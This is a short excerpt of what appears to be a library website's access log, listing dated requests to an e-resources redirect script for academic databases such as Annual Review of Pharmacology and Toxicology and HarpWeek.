149  8/Aug/11 19:41  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/pharmtox&databasename=Annual Review of Pharmacology and Toxicology&&dbname=arjournals.annualreviews.org/loi/pharmtox
149  4/Aug/11 02:14  /cgi-bin/eresources/remoteinfo.py?linkname=classweb.loc.gov/Auto/&databasename=Library of Congress Classification Web&&dbname=classweb.loc.gov/Auto/
149  1/Sep/08 03:43  /cgi-bin/eresources/remoteinfo.py?linkname=app.harpweek.com/&dbname=app.harpweek.com/
149  1/Sep/08 03:50